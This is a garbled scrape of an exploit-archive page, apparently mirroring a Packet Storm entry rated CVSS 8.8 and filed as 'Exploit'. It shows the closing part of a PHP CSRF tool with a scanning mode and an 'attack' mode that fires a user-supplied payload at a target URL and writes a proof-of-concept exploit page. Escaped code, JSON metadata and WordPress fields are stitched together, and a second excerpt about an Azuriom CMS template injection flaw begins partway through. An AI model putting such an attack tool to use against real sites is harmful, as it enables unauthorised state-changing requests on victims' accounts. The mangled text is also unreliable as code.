\\n Logger::log(\\”Target: \\” . $params[‘url’]);\\n Logger::log(\\”Action: \\” . $params[‘action’]);\\n Logger::log(\\”Payload: \\” . $params[‘payload’]);\\n \\n if ($params[‘action’] == ‘detect’) {\\n \/\/ Detection mode\\n Logger::log(\\”Running in DETECTION mode\\”);\\n $results = $detector-\\u003escan($params[‘url’]);\\n \\n echo \\”\\\\n\\” . COLOR_BOLD . \\”=== SCAN RESULTS ===\\\\n\\” . COLOR_RESET;\\n echo \\”Vulnerable: \\” . ($results[‘vulnerable’] ? COLOR_RED . \\”YES\\” : COLOR_GREEN . \\”NO\\”) . COLOR_RESET . \\”\\\\n\\”;\\n echo \\”Protection: \\” . $results[‘protection’] . \\”\\\\n\\”;\\n echo \\”Forms Found: \\” . count($results[‘forms’]) . \\”\\\\n\\”;\\n echo \\”Tokens Found: \\” . count($results[‘tokens’]) . \\”\\\\n\\”;\\n \\n if (!empty($results[‘tokens’])) {\\n echo \\”\\\\n\\” . COLOR_BOLD . \\”Detected Tokens:\\\\n\\” . COLOR_RESET;\\n foreach ($results[‘tokens’] as $token) {\\n echo \\” – Type: \\” . $token[‘type’] . \\”\\\\n\\”;\\n if (isset($token[‘name’])) {\\n echo \\” Name: \\” . $token[‘name’] . \\”\\\\n\\”;\\n }\\n echo \\” Value: \\” . substr($token[‘value’], 0, 50) . \\”…\\\\n\\”;\\n }\\n }\\n \\n if (!empty($results[‘forms’])) {\\n echo \\”\\\\n\\” . COLOR_BOLD . \\”Detected Forms:\\\\n\\” . COLOR_RESET;\\n foreach ($results[‘forms’] as $i =\\u003e $form) {\\n echo \\” Form #\\” . ($i + 1) . \\”:\\\\n\\”;\\n echo \\” Action: \\” . $form[‘action’] . \\”\\\\n\\”;\\n echo \\” Method: \\” . $form[‘method’] . \\”\\\\n\\”;\\n echo \\” Inputs: \\” . implode(‘, ‘, $form[‘inputs’]) . \\”\\\\n\\”;\\n }\\n }\\n \\n \/\/ Generate report\\n $report = \\”CSRF Vulnerability Scan Report\\\\n\\”;\\n $report .= \\”=============================\\\\n\\”;\\n $report .= \\”Target: \\” . $params[‘url’] . \\”\\\\n\\”;\\n $report .= \\”Time: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\”;\\n $report .= \\”Vulnerable: \\” . ($results[‘vulnerable’] ? \\”YES\\” : \\”NO\\”) . \\”\\\\n\\”;\\n $report .= \\”Protection: \\” . $results[‘protection’] . \\”\\\\n\\”;\\n $report .= \\”Risk Level: \\” . ($results[‘vulnerable’] ? \\”HIGH\\” : \\”LOW\\”) . \\”\\\\n\\\\n\\”;\\n \\n if ($results[‘vulnerable’]) {\\n $report .= \\”RECOMMENDATIONS:\\\\n\\”;\\n $report .= \\”1. Implement proper CSRF tokens\\\\n\\”;\\n $report .= \\”2. Set SameSite cookie attributes\\\\n\\”;\\n $report .= \\”3. Validate Origin\/Referer headers\\\\n\\”;\\n $report .= \\”4. Use state-changing verbs (POST\/PUT\/DELETE)\\\\n\\”;\\n }\\n \\n file_put_contents(‘csrf_report.txt’, $report);\\n Logger::log(\\”Detailed report saved to: csrf_report.txt\\”, ‘INFO’);\\n \\n } elseif ($params[‘action’] == ‘attack’) {\\n \/\/ Attack mode\\n Logger::log(\\”Running in ATTACK mode\\”, ‘WARNING’);\\n \\n echo COLOR_YELLOW . \\”\\\\n[!] WARNING: This will execute actual CSRF attacks!\\\\n\\”;\\n echo \\”[!] Only use on authorized systems!\\\\n\\”;\\n echo \\”[!] Press Ctrl+C to abort within 5 seconds…\\\\n\\” . COLOR_RESET;\\n \\n sleep(5);\\n \\n $success = $attacker-\\u003eattack($params[‘url’], $params[‘payload’]);\\n \\n if ($success) {\\n echo COLOR_GREEN . \\”\\\\n[+] ATTACK COMPLETED\\\\n\\” . COLOR_RESET;\\n echo \\”Check ‘csrf_poc.html’ for a demo exploit\\\\n\\”;\\n echo \\”Check ‘successful_attacks.log’ for details\\\\n\\”;\\n } else {\\n echo COLOR_RED . \\”\\\\n[-] ATTACK MAY HAVE FAILED\\\\n\\” . COLOR_RESET;\\n echo \\”Check ‘csrf_debug.log’ for error details\\\\n\\”;\\n }\\n }\\n \\n echo \\”\\\\n\\” . COLOR_BOLD . \\”=== SESSION INFORMATION ===\\\\n\\” . COLOR_RESET;\\n echo \\”Cookies saved to: \\” . COOKIE_FILE . \\”\\\\n\\”;\\n echo \\”Debug log: \\” . DEBUG_FILE . \\”\\\\n\\”;\\n echo \\”Timestamp: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\”;\\n \\n \/\/ Cleanup\\n if (file_exists(‘debug_response.html’)) {\\n unlink(‘debug_response.html’);\\n }\\n \\n Logger::log(\\”Execution completed\\”, ‘INFO’);\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212768″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212768\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-12T17:15:52″,”description”:”A client-side template injection vulnerability affects the Azuriom CMS Admin Dashboard in version 1.2.6. Several dashboard components widgets, plugins, and admin panels render untrusted user…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-30774","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n